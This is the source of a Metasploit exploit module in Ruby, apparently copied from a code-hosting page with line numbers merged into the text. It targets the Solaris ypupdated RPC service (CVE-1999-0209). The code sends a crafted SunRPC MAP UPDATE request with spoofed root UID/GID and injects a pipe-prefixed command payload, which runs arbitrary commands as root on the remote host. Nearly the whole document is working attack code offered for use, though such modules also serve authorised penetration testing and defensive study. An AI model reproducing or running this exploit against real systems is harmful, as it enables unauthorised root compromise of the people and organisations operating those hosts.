Path: blob/master/modules/exploits/solaris/sunrpc/ypupdated_exec.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'English'6class MetasploitModule < Msf::Exploit::Remote7Rank = ExcellentRanking89include Msf::Exploit::Remote::SunRPC1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Solaris ypupdated Command Execution',16'Description' => %q{17This exploit targets a weakness in the way the ypupdated RPC18application uses the command shell when handling a MAP UPDATE19request. Extra commands may be launched through this command20shell, which runs as root on the remote host, by passing21commands in the format '|<command>'.2223Vulnerable systems include Solaris 2.7, 8, 9, and 10, when24ypupdated is started with the '-i' command-line option.25},26'Author' => [ 'I)ruid <druid[at]caughq.org>' ],27'License' => MSF_LICENSE,28'References' => [29['CVE', '1999-0209'],30['OSVDB', '11517'],31['BID', '1749'],32],33'Privileged' => true,34'Platform' => %w[solaris unix],35'Arch' => ARCH_CMD,36'Payload' => {37'Space' => 1024,38'DisableNops' => true,39'Compat' => {40'PayloadType' => 'cmd',41'RequiredCmd' => 'generic perl telnet'42}43},44'Targets' => [ ['Automatic', {}], ],45'DefaultTarget' => 0,46'DisclosureDate' => '1994-12-12',47'Notes' => {48'Stability' => [CRASH_SAFE],49'Reliability' => [REPEATABLE_SESSION],50'SideEffects' => [IOC_IN_LOGS]51}52)53)5455register_options([56OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),57OptInt.new('GID', [false, 'GID to emulate', 0]),58OptInt.new('UID', [false, 'UID to emulate', 0])59])60end6162def exploit63hostname = datastore['HOSTNAME']64program = 10002865progver = 166procedure = 16768print_status('Sending PortMap request for ypupdated program')69sunrpc_create('udp', program, progver)7071print_status("Sending MAP UPDATE request with command '#{payload.encoded}'")72print_status('Waiting for response...')73sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])74command = '|' + payload.encoded75msg = Rex::Encoder::XDR.encode(command, 2, 0x78000000, 2, 0x78000000)76sunrpc_call(procedure, msg)7778sunrpc_destroy7980print_status('No Errors, appears to have succeeded!')81rescue ::Rex::Proto::SunRPC::RPCTimeout82print_warning('Warning: ' + $ERROR_INFO)83end84end858687